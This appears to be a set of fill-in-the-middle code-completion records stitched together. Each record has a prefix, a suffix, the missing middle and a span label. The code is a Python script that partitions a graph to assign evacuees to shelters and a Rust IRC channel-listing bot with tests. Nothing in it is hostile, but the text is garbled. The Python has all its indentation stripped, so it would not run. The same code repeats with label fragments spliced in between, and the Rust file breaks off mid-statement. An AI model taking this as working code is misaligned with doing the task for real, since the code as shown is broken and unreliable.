print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n") | conditional_block |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def | (G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| edge_expansion | identifier_name |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> |
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
} | identifier_body |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 |
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
